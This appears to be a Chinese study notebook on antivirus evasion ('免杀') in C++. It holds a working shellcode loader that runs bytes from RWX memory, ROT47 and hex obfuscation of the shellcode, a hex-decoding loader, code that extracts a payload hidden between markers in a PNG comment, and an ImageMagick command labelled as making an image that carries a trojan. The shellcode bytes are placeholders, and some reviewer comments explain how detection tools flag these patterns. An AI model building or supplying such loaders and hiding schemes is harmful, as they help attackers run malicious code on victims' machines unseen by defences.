C++免杀学习

基本的C++ shellcode加载器

#include <iostream>
#include <windows.h>

// Byte buffer that main() copies into executable memory and then calls.
// The initializer is a string literal, so the array also holds the implicit
// trailing NUL and sizeof(shellcode) is one larger than the six bytes written.
unsigned char shellcode[] = "\x90\x90\x90\x90\x90\x90"; // placeholder bytes; the author's note says to substitute the shellcode here

// Minimal loader: copies the bytes of `shellcode` into freshly allocated
// executable memory and calls them as a function taking no arguments.
// Returns 1 if the allocation fails, 0 otherwise.
// NOTE(review): a private PAGE_EXECUTE_READWRITE region that is written and
// then called into is a pattern endpoint tooling commonly alerts on, and a
// plain byte array in the binary is also visible to static scanning.
int main() {
    // Allocate committed memory that is readable, writable and executable (RWX).
    void* execMem = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (execMem == NULL) {
        // The message text means "memory allocation failed".
        std::cerr << "内存分配失败" << std::endl;
        return 1;
    }
    // Copy the buffer, including its trailing NUL, into the new region.
    memcpy(execMem, shellcode, sizeof(shellcode));
    // Cast the region to a void(*)() function pointer and call it.
    ((void(*)())execMem)();
    // Release the region; this line is only reached if the called bytes return.
    VirtualFree(execMem, 0, MEM_RELEASE);
    return 0;
}

C++判断程序是按64位还是32位Windows编译（_WIN64是编译期宏，反映的是编译目标，而不是运行时主机的位数）

#include <iostream>

int main() {
    // _WIN64 is a predefined compiler macro, so the choice below is made when
    // the program is built: it reports the target the binary was compiled for,
    // not the bitness of the machine it later runs on. Any build without
    // _WIN64 defined takes the "32-bit" branch.
#ifdef _WIN64
    const char* label = "64位Windows";
#else
    const char* label = "32位Windows";
#endif
    std::cout << label << std::endl;
    return 0;
}

C++ ROT47加密（ROT47是无密钥的固定字符替换，属于混淆而非真正的加密）

// Applies ROT47 to plainText and returns the result.
// Every character with code 33..126 is rotated by 47 positions inside that
// 94-character range; all other characters are copied unchanged.
// ROT47 has no key and is its own inverse, so it only obscures text: anyone
// can undo it by applying the same transform again.
std::string rot47Encrypt(const std::string& plainText) {
    std::string rotated;
    rotated.reserve(plainText.size());
    for (std::size_t i = 0; i < plainText.size(); ++i) {
        const char ch = plainText[i];
        const bool inRange = (ch >= 33 && ch <= 126);
        rotated.push_back(inRange ? static_cast<char>(33 + (ch - 33 + 47) % 94) : ch);
    }
    return rotated;
}

C++ ROT47解密

// Reverses ROT47 on encryptedText and returns the original text.
// Rotating by 47 within the 94-character range 33..126 twice is a full turn,
// so the arithmetic is the same as in the forward direction. Characters
// outside 33..126 are copied unchanged.
std::string rot47Decrypt(const std::string& encryptedText) {
    std::string restored;
    restored.reserve(encryptedText.size());
    for (std::size_t i = 0; i < encryptedText.size(); ++i) {
        const char ch = encryptedText[i];
        const bool inRange = (ch >= 33 && ch <= 126);
        restored.push_back(inRange ? static_cast<char>(33 + (ch - 33 + 47) % 94) : ch);
    }
    return restored;
}

C++ hex解码

#include <iostream>
#include <stdexcept>
#include <string>

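// Decodes a string of hexadecimal digit pairs into the bytes they encode.
//
// hexString must contain an even number of characters, each one of
// 0-9, a-f or A-F. Returns the decoded bytes as a std::string (which may
// contain NUL bytes); an empty input yields an empty string.
//
// Throws std::invalid_argument for malformed input. Parsing each pair with
// std::stoi accepted more than hex digits: a leading sign or space was
// consumed as part of the number, and a trailing single digit of an
// odd-length input was decoded as a byte of its own. Validating every
// character keeps the decoder strict, so malformed input is rejected
// instead of being silently turned into different bytes.
std::string hexDecode(const std::string& hexString) {
    // Value of one hex digit, or -1 if the character is not a hex digit.
    const auto nibble = [](char ch) -> int {
        if (ch >= '0' && ch <= '9') return ch - '0';
        if (ch >= 'a' && ch <= 'f') return ch - 'a' + 10;
        if (ch >= 'A' && ch <= 'F') return ch - 'A' + 10;
        return -1;
    };

    if (hexString.length() % 2 != 0) {
        throw std::invalid_argument("hexDecode: odd number of hex digits");
    }

    std::string decodedString;
    decodedString.reserve(hexString.length() / 2);
    for (size_t i = 0; i < hexString.length(); i += 2) {
        const int high = nibble(hexString[i]);
        const int low = nibble(hexString[i + 1]);
        if (high < 0 || low < 0) {
            throw std::invalid_argument("hexDecode: non-hexadecimal character in input");
        }
        decodedString += static_cast<char>((high << 4) | low);
    }
    return decodedString;
}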

int main() {
    // The literal is the ASCII text "Hello, World!" written as hex digit pairs.
    const std::string decoded = hexDecode("48656c6c6f2c20576f726c6421");
    std::cout << "Decoded String: " << decoded << std::endl;
    return 0;
}

C++ Hex版shellcode加载进内存

#include <iostream>
#include <Windows.h>

// Shellcode written as a string of hexadecimal digit pairs; main() decodes it
// into raw bytes before use.
const char* hexShellcode = "9090909090..."; // placeholder; the author's note says to replace it with your shellcode

// Decodes `hexShellcode` from hex text into bytes, copies the bytes into
// executable memory and calls them. Returns 1 if the allocation fails, 0
// otherwise.
// NOTE(review): keeping the bytes as hex text only changes how they look in
// the file on disk. After the decode loop the same raw bytes sit in an RWX
// region and are called through a function pointer, so behaviour-based and
// in-memory inspection sees the same thing as with a plain byte array.
int main() {
    // Convert the hex string into a byte sequence, two characters per byte.
    // std::stoi throws std::invalid_argument for a pair that does not start
    // with a hex digit; nothing here catches that exception.
    std::string hexString(hexShellcode);
    std::string byteString;
    std::vector<unsigned char> shellcodeBytes;
    for (size_t i = 0; i < hexString.length(); i += 2) {
        byteString = hexString.substr(i, 2);
        unsigned char byte = static_cast<unsigned char>(std::stoi(byteString, nullptr, 16));
        shellcodeBytes.push_back(byte);
    }
    // Reserve and commit a region that is readable, writable and executable (RWX).
    LPVOID execMemory = VirtualAlloc(NULL, shellcodeBytes.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (execMemory == NULL) {
        std::cout << "Failed to allocate memory." << std::endl;
        return 1;
    }
    // Copy the decoded bytes into the allocated region.
    memcpy(execMemory, shellcodeBytes.data(), shellcodeBytes.size());
    // Treat the region as a function taking no arguments and call it.
    typedef void (*ShellcodeFunc)();
    ShellcodeFunc shellcodeFunc = reinterpret_cast<ShellcodeFunc>(execMemory);
    shellcodeFunc();
    // Release the region; this line is only reached if the called bytes return.
    VirtualFree(execMemory, 0, MEM_RELEASE);
    return 0;
}

C++将hex解码为字节组后输出

#include <iostream>
#include <string>
#include <vector>

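// Decodes a string of hex digit pairs into bytes, prints every byte in
// hexadecimal, then prints how many bytes were decoded.
// std::stoi throws std::invalid_argument for a pair that does not start with
// a hex digit (the placeholder text below is such a case); it is not caught
// here, so the placeholder has to be replaced with real hex text first.
int main() {
    std::string hexString = "hex内容";

    std::vector<unsigned char> byteSequence;
    byteSequence.reserve(hexString.length() / 2);
    for (size_t i = 0; i < hexString.length(); i += 2) {
        const std::string byteString = hexString.substr(i, 2);
        byteSequence.push_back(static_cast<unsigned char>(std::stoi(byteString, nullptr, 16)));
    }

    // Print each byte as exactly two hex digits, so 0x0a appears as "0a"
    // rather than "a" and the output lines up with the input pairs.
    const char previousFill = std::cout.fill('0');
    std::cout << std::hex;
    for (const unsigned char byte : byteSequence) {
        std::cout.width(2);  // width applies to the next insertion only
        std::cout << static_cast<int>(byte) << " ";
    }
    std::cout << std::endl;

    // std::hex stays in effect on the stream; without switching back to
    // decimal the byte count below would itself be printed in hexadecimal.
    std::cout.fill(previousFill);
    std::cout << std::dec << "大小:" << byteSequence.size() << std::endl;
    return 0;
}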

获取图片注释内容

#include <iostream>
#include <fstream>
#include <string>
#include <regex>

// Returns the text found between the literal markers "comment" and "qwqover"
// in pngData, or an empty string when the markers are not found.
// The data is not parsed as PNG: the whole buffer is searched as raw bytes.
// The capture is greedy, so it runs up to the last "qwqover" on the matched
// line, and '.' does not match line terminators in the default grammar.
// NOTE(review): presumably the leading marker is the keyword of the PNG text
// chunk, in which case the capture starts with that chunk's NUL separator;
// verify against a real file.
std::string extractComment(const std::string& pngData) {
    const std::regex markerPattern("comment(.*)qwqover");
    std::smatch found;
    if (!std::regex_search(pngData, found, markerPattern) || found.size() <= 1) {
        return std::string();
    }
    return found.str(1);
}

// Reads the whole file `filename` in binary mode and returns its bytes.
// If the file cannot be opened, an error line is written to std::cerr and an
// empty string is returned. The size is taken by seeking to the end of the
// stream; neither tellg() nor read() is checked for failure.
std::string readPNGFile(const std::string& filename) {
    std::string contents;
    std::ifstream input(filename, std::ios::binary);
    if (!input) {
        std::cerr << "Failed to open file: " << filename << std::endl;
        return contents;
    }

    // Measure the file, size the buffer to match, then read from the start.
    input.seekg(0, std::ios::end);
    const auto length = input.tellg();
    contents.resize(length);
    input.seekg(0, std::ios::beg);
    input.read(&contents[0], contents.size());
    input.close();
    return contents;
}

int main() {
    // Load the whole image file, then print whatever sits between the markers
    // that extractComment() searches for.
    const std::string imageBytes = readPNGFile("example.png");
    std::cout << "Comment: " << extractComment(imageBytes) << std::endl;

    return 0;
}

创建一个带马的图片

# Uses ImageMagick's convert to create a 10x10 white PNG whose comment
# metadata is the given text. The trailing "qwqover" is the end marker that
# the regex in extractComment() searches for, so the text it recovers is
# "nihaozongzhongji".
# NOTE(review): a fixed marker like this inside image metadata is something
# content inspection can match on.
convert -comment "nihaozongzhongjiqwqover" -size 10x10 xc:white example.png

 
